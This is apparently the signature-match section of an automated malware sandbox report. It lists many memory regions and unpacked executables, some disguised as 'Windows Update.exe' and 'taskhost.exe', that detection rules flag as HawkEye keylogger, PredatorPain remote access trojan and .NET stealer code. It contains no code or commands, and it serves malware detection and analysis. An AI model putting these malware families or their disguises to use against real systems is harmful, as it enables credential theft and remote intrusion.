                    Source: 5.2.taskhost.exe.30d936c.5.raw.unpack, type: UNPACKEDPE; Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 5.2.taskhost.exe.311411c.4.raw.unpack, type: UNPACKEDPE; Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 7.0.iExplorer.exe.72e7ae.3.raw.unpack, type: UNPACKEDPE; Matched rule: RAT_PredatorPain date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects PredatorPain RAT, reference = http://malwareconfig.com/stats/PredatorPain
                    Source: 7.0.iExplorer.exe.72e7ae.3.raw.unpack, type: UNPACKEDPE; Matched rule: PredatorPain date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/PredatorPain
                    Source: 7.0.iExplorer.exe.6d0000.0.unpack, type: UNPACKEDPE; Matched rule: RAT_PredatorPain date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects PredatorPain RAT, reference = http://malwareconfig.com/stats/PredatorPain
                    Source: 7.0.iExplorer.exe.6d0000.0.unpack, type: UNPACKEDPE; Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 7.0.iExplorer.exe.6d0000.0.unpack, type: UNPACKEDPE; Matched rule: PredatorPain date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/PredatorPain
                    Source: 5.2.taskhost.exe.a1fa72.3.raw.unpack, type: UNPACKEDPE; Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 5.2.taskhost.exe.a1fa72.3.raw.unpack, type: UNPACKEDPE; Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 7.0.iExplorer.exe.6d8949.2.raw.unpack, type: UNPACKEDPE; Matched rule: RAT_PredatorPain date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects PredatorPain RAT, reference = http://malwareconfig.com/stats/PredatorPain
                    Source: 7.0.iExplorer.exe.6d8949.2.raw.unpack, type: UNPACKEDPE; Matched rule: PredatorPain date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/PredatorPain
                    Source: 8.0.Windows Update.exe.42e7ae.5.raw.unpack, type: UNPACKEDPE; Matched rule: RAT_PredatorPain date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects PredatorPain RAT, reference = http://malwareconfig.com/stats/PredatorPain
                    Source: 8.0.Windows Update.exe.42e7ae.5.raw.unpack, type: UNPACKEDPE; Matched rule: PredatorPain date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/PredatorPain
                    Source: 7.0.iExplorer.exe.6d6f44.1.raw.unpack, type: UNPACKEDPE; Matched rule: RAT_PredatorPain date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects PredatorPain RAT, reference = http://malwareconfig.com/stats/PredatorPain
                    Source: 7.0.iExplorer.exe.6d6f44.1.raw.unpack, type: UNPACKEDPE; Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 7.0.iExplorer.exe.6d6f44.1.raw.unpack, type: UNPACKEDPE; Matched rule: PredatorPain date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/PredatorPain
                    Source: 5.0.taskhost.exe.a1fa72.1.raw.unpack, type: UNPACKEDPE; Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 5.0.taskhost.exe.a1fa72.1.raw.unpack, type: UNPACKEDPE; Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 5.2.taskhost.exe.9c8208.1.raw.unpack, type: UNPACKEDPE; Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 5.2.taskhost.exe.9c8208.1.raw.unpack, type: UNPACKEDPE; Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 5.2.taskhost.exe.9c8208.1.raw.unpack, type: UNPACKEDPE; Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 7.2.iExplorer.exe.72e7ae.1.raw.unpack, type: UNPACKEDPE; Matched rule: RAT_PredatorPain date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects PredatorPain RAT, reference = http://malwareconfig.com/stats/PredatorPain
                    Source: 7.2.iExplorer.exe.72e7ae.1.raw.unpack, type: UNPACKEDPE; Matched rule: PredatorPain date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/PredatorPain
                    Source: 8.0.Windows Update.exe.42e7ae.1.raw.unpack, type: UNPACKEDPE; Matched rule: RAT_PredatorPain date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects PredatorPain RAT, reference = http://malwareconfig.com/stats/PredatorPain
                    Source: 8.0.Windows Update.exe.42e7ae.1.raw.unpack, type: UNPACKEDPE; Matched rule: PredatorPain date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/PredatorPain
                    Source: 5.3.taskhost.exe.7421c02.0.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 5.3.taskhost.exe.7421c02.0.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 8.2.Windows Update.exe.42e7ae.3.raw.unpack, type: UNPACKEDPEMatched rule: RAT_PredatorPain date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects PredatorPain RAT, reference = http://malwareconfig.com/stats/PredatorPain
                    Source: 8.2.Windows Update.exe.42e7ae.3.raw.unpack, type: UNPACKEDPEMatched rule: PredatorPain date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/PredatorPain
                    Source: 5.2.taskhost.exe.9c0000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 5.2.taskhost.exe.9c0000.0.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 5.2.taskhost.exe.9c0000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 8.2.Windows Update.exe.3d8949.2.raw.unpack, type: UNPACKEDPEMatched rule: RAT_PredatorPain date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects PredatorPain RAT, reference = http://malwareconfig.com/stats/PredatorPain
                    Source: 8.2.Windows Update.exe.3d8949.2.raw.unpack, type: UNPACKEDPEMatched rule: PredatorPain date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/PredatorPain
                    Source: 7.2.iExplorer.exe.6d8949.2.raw.unpack, type: UNPACKEDPEMatched rule: RAT_PredatorPain date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects PredatorPain RAT, reference = http://malwareconfig.com/stats/PredatorPain
                    Source: 7.2.iExplorer.exe.6d8949.2.raw.unpack, type: UNPACKEDPEMatched rule: PredatorPain date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/PredatorPain
                    Source: 5.0.taskhost.exe.9c8208.3.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 5.0.taskhost.exe.9c8208.3.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 5.0.taskhost.exe.9c8208.3.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 8.2.Windows Update.exe.3d6f44.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_PredatorPain date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects PredatorPain RAT, reference = http://malwareconfig.com/stats/PredatorPain
                    Source: 8.2.Windows Update.exe.3d6f44.1.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 8.2.Windows Update.exe.3d6f44.1.raw.unpack, type: UNPACKEDPEMatched rule: PredatorPain date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/PredatorPain
                    Source: 7.2.iExplorer.exe.6d0000.0.unpack, type: UNPACKEDPEMatched rule: RAT_PredatorPain date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects PredatorPain RAT, reference = http://malwareconfig.com/stats/PredatorPain
                    Source: 7.2.iExplorer.exe.6d0000.0.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 7.2.iExplorer.exe.6d0000.0.unpack, type: UNPACKEDPEMatched rule: PredatorPain date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/PredatorPain
                    Source: 5.0.taskhost.exe.9c0000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 5.0.taskhost.exe.9c0000.0.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 5.0.taskhost.exe.9c0000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 8.0.Windows Update.exe.3d0000.4.unpack, type: UNPACKEDPEMatched rule: RAT_PredatorPain date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects PredatorPain RAT, reference = http://malwareconfig.com/stats/PredatorPain
                    Source: 8.0.Windows Update.exe.3d0000.4.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 8.0.Windows Update.exe.3d0000.4.unpack, type: UNPACKEDPEMatched rule: PredatorPain date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/PredatorPain
                    Source: 8.0.Windows Update.exe.3d8949.12.raw.unpack, type: UNPACKEDPEMatched rule: RAT_PredatorPain date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects PredatorPain RAT, reference = http://malwareconfig.com/stats/PredatorPain
                    Source: 8.0.Windows Update.exe.3d8949.12.raw.unpack, type: UNPACKEDPEMatched rule: PredatorPain date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/PredatorPain
                    Source: 7.2.iExplorer.exe.2e4bf0c.4.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 8.0.Windows Update.exe.42e7ae.13.raw.unpack, type: UNPACKEDPEMatched rule: RAT_PredatorPain date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects PredatorPain RAT, reference = http://malwareconfig.com/stats/PredatorPain
                    Source: 8.0.Windows Update.exe.42e7ae.13.raw.unpack, type: UNPACKEDPEMatched rule: PredatorPain date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/PredatorPain
                    Source: 8.0.Windows Update.exe.3d6f44.7.raw.unpack, type: UNPACKEDPEMatched rule: RAT_PredatorPain date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects PredatorPain RAT, reference = http://malwareconfig.com/stats/PredatorPain
                    Source: 8.0.Windows Update.exe.3d6f44.7.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 8.0.Windows Update.exe.3d6f44.7.raw.unpack, type: UNPACKEDPEMatched rule: PredatorPain date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/PredatorPain
                    Source: 8.0.Windows Update.exe.2b89e50.14.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 8.2.Windows Update.exe.2b89e50.4.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 7.2.iExplorer.exe.6d6f44.3.raw.unpack, type: UNPACKEDPEMatched rule: RAT_PredatorPain date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects PredatorPain RAT, reference = http://malwareconfig.com/stats/PredatorPain
                    Source: 7.2.iExplorer.exe.6d6f44.3.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 7.2.iExplorer.exe.6d6f44.3.raw.unpack, type: UNPACKEDPEMatched rule: PredatorPain date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/PredatorPain
                    Source: 8.0.Windows Update.exe.3d6f44.11.raw.unpack, type: UNPACKEDPEMatched rule: RAT_PredatorPain date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects PredatorPain RAT, reference = http://malwareconfig.com/stats/PredatorPain
                    Source: 8.0.Windows Update.exe.3d6f44.11.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 8.0.Windows Update.exe.3d6f44.11.raw.unpack, type: UNPACKEDPEMatched rule: PredatorPain date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/PredatorPain
                    Source: 8.0.Windows Update.exe.2b89ea8.8.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 8.0.Windows Update.exe.3d8949.6.raw.unpack, type: UNPACKEDPEMatched rule: RAT_PredatorPain date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects PredatorPain RAT, reference = http://malwareconfig.com/stats/PredatorPain
                    Source: 8.0.Windows Update.exe.3d8949.6.raw.unpack, type: UNPACKEDPEMatched rule: PredatorPain date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/PredatorPain
                    Source: 5.2.taskhost.exe.9c9c0d.2.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 5.2.taskhost.exe.9c9c0d.2.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 8.0.Windows Update.exe.3d8949.3.raw.unpack, type: UNPACKEDPEMatched rule: RAT_PredatorPain date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects PredatorPain RAT, reference = http://malwareconfig.com/stats/PredatorPain
                    Source: 8.0.Windows Update.exe.3d8949.3.raw.unpack, type: UNPACKEDPEMatched rule: PredatorPain date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/PredatorPain
                    Source: 8.0.Windows Update.exe.3d0000.0.unpack, type: UNPACKEDPEMatched rule: RAT_PredatorPain date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects PredatorPain RAT, reference = http://malwareconfig.com/stats/PredatorPain
                    Source: 8.0.Windows Update.exe.3d0000.0.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 8.0.Windows Update.exe.3d0000.0.unpack, type: UNPACKEDPEMatched rule: PredatorPain date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/PredatorPain
                    Source: 8.0.Windows Update.exe.3d6f44.2.raw.unpack, type: UNPACKEDPEMatched rule: RAT_PredatorPain date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects PredatorPain RAT, reference = http://malwareconfig.com/stats/PredatorPain
                    Source: 8.0.Windows Update.exe.3d6f44.2.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 8.0.Windows Update.exe.3d6f44.2.raw.unpack, type: UNPACKEDPEMatched rule: PredatorPain date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/PredatorPain
                    Source: 5.0.taskhost.exe.9c9c0d.2.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 5.0.taskhost.exe.9c9c0d.2.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 8.2.Windows Update.exe.3d0000.0.unpack, type: UNPACKEDPEMatched rule: RAT_PredatorPain date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects PredatorPain RAT, reference = http://malwareconfig.com/stats/PredatorPain
                    Source: 8.2.Windows Update.exe.3d0000.0.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 8.2.Windows Update.exe.3d0000.0.unpack, type: UNPACKEDPEMatched rule: PredatorPain date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/PredatorPain
                    Source: 00000005.00000000.227084659.00000000009C2000.00000002.00020000.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000005.00000000.227084659.00000000009C2000.00000002.00020000.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000008.00000000.276336479.00000000003D2000.00000002.00020000.sdmp, type: MEMORYMatched rule: RAT_PredatorPain date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects PredatorPain RAT, reference = http://malwareconfig.com/stats/PredatorPain
                    Source: 00000008.00000000.276336479.00000000003D2000.00000002.00020000.sdmp, type: MEMORYMatched rule: PredatorPain date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/PredatorPain
                    Source: 00000005.00000003.247040604.0000000007404000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000005.00000003.247040604.0000000007404000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000008.00000000.247374939.00000000003D2000.00000002.00020000.sdmp, type: MEMORYMatched rule: RAT_PredatorPain date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects PredatorPain RAT, reference = http://malwareconfig.com/stats/PredatorPain
                    Source: 00000008.00000000.247374939.00000000003D2000.00000002.00020000.sdmp, type: MEMORYMatched rule: PredatorPain date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/PredatorPain
                    Source: 00000008.00000002.310765345.00000000003D2000.00000002.00020000.sdmp, type: MEMORYMatched rule: RAT_PredatorPain date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects PredatorPain RAT, reference = http://malwareconfig.com/stats/PredatorPain
                    Source: 00000008.00000002.310765345.00000000003D2000.00000002.00020000.sdmp, type: MEMORYMatched rule: PredatorPain date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/PredatorPain
                    Source: 00000022.00000002.340891533.00000000007E2000.00000002.00020000.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000022.00000002.340891533.00000000007E2000.00000002.00020000.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000001A.00000000.286586806.0000000000472000.00000002.00020000.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0000001A.00000000.286586806.0000000000472000.00000002.00020000.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000008.00000000.290325606.0000000002B61000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_PredatorPain date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects PredatorPain RAT, reference = http://malwareconfig.com/stats/PredatorPain
                    Source: 00000008.00000000.290325606.0000000002B61000.00000004.00000001.sdmp, type: MEMORYMatched rule: PredatorPain date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/PredatorPain
                    Source: 00000007.00000000.228658758.00000000006D2000.00000002.00020000.sdmp, type: MEMORYMatched rule: RAT_PredatorPain date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects PredatorPain RAT, reference = http://malwareconfig.com/stats/PredatorPain
                    Source: 00000007.00000000.228658758.00000000006D2000.00000002.00020000.sdmp, type: MEMORYMatched rule: PredatorPain date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/PredatorPain
                    Source: 00000022.00000000.321958872.00000000007E2000.00000002.00020000.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
